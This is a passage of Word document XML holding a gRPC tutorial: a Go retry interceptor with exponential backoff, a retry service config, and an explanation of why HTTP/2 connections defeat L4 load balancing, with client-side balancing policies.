    <w:p w14:paraId="7C7DF48D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    invoker grpc.UnaryInvoker,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BAE0D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    opts ...grpc.CallOption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0E0B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8DA70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    retryableCodes := map[codes.Code]bool{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10E95B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        codes.Unavailable: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D52CD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        codes.ResourceExhausted: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25F357" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F55C80" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA52C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    maxRetries := 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B763937" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    backoff := 100 * time.Millisecond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117DD12B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE1E76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for attempt := 0; attempt &lt;= maxRetries; attempt++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873656A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        err := invoker(ctx, method, req, reply, cc, opts...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E067776" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err == nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3921CF8C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123F3FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5431B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803F62D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if !retryableCodes[status.Code(err)] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07D4C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return err  // non-retryable error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A5ACA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9CD54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046D01B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if attempt == maxRetries {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA6550" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return err  // exhausted retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD8F2C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A4E0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940EBA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        // Check if context deadline would be exceeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CBEC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if deadline, ok := ctx.Deadline(); ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4FCE15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            if time.Now().Add(backoff).After(deadline) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A1C3C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                return err  // not enough time to retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0CCCA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D21E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA3717" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42105295" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        // Exponential backoff with jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D072F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        jitter := time.Duration(rand.Int63n(int64(backoff / 2)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B493C83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        time.Sleep(backoff + jitter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A34E65" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        backoff = min(backoff*2, 30*time.Second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B036C9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A5013" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EB39B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D1ED1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7BE42C23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// gRPC built-in retry (service config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E306D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>serviceConfig := `{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314AD39" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "methodConfig": [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4645A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "name": [{"service": "orders.v1.OrderService"}],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA6791" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "retryPolicy": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893E7FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "maxAttempts": 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37A53D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "initialBackoff": "0.1s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACABDD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "maxBackoff": "1s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1F983" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "backoffMultiplier": 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2DDB98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "retryableStatusCodes": ["UNAVAILABLE", "RESOURCE_EXHAUSTED"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E6196" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A028BA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "timeout": "5s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3C561" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7F9ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BAAED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3A4917EC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>conn, err := grpc.Dial(address,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21278533" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.WithDefaultServiceConfig(serviceConfig),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DCA33" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2C3BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC Load Balancing — The Distributed Systems Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C3939" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The L4 vs L7 load balancing problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC1A72" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198F5FFB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/1.1 load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61EE7C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L4 (TCP): load balancer at TCP level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406DDC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Persistent connection per client → all requests on one connection → one backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676966C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server-side L4 (HAProxy, AWS NLB): works, but no per-request routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E758E7E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE848C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L7 (HTTP): load balancer parses HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C94F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Sees individual requests → routes per-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BBB0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    HTTP/1.1: one request per connection → easy to load balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB383BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1D556" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC/HTTP/2 load balancing challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF1F865" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2: multiple RPCs multiplexed on ONE TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2FE5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L4 load balancer: sees ONE TCP connection → routes all RPCs to ONE backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74A8DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  All gRPC requests from a client → one backend → no load balancing!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7EE022" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A693484" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Example with 10 backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110A6B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Client opens 1 connection (HTTP/2 multiplexes all requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D775CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    L4 LB: routes connection to Backend 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CECE00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    All RPCs: go to Backend 3 (9 other backends sit idle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1CD5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Backend 3: overloaded, others are underutilized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF029E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84307B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39449395" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="16DE9E1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Client-side load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75646FFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client maintains list of backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29291241" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   For each RPC: client picks a backend (round-robin, least-connections, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE1D42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Creates separate HTTP/2 connection to each backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5380E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26644B14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0F782" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Name resolution: "grpc.example.com:443" → [ip1:443, ip2:443, ip3:443]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A442DBC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Load balancing policy: choose which address for this RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B7AB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Subchannel: HTTP/2 connection to each address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF63CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28644E1F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC built-in policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B15B9FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     pick_first: always use first address (no load balancing, but handles failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C86EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     round_robin: cycle through addresses (simple, effective for uniform workloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592153DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     grpclb: deprecated, replaced by xDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B4BC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     rls (Route Lookup Service): look up routing from external service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B71338" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486923FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04964FD2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     conn, err := grpc.Dial(</w:t>
      </w:r>
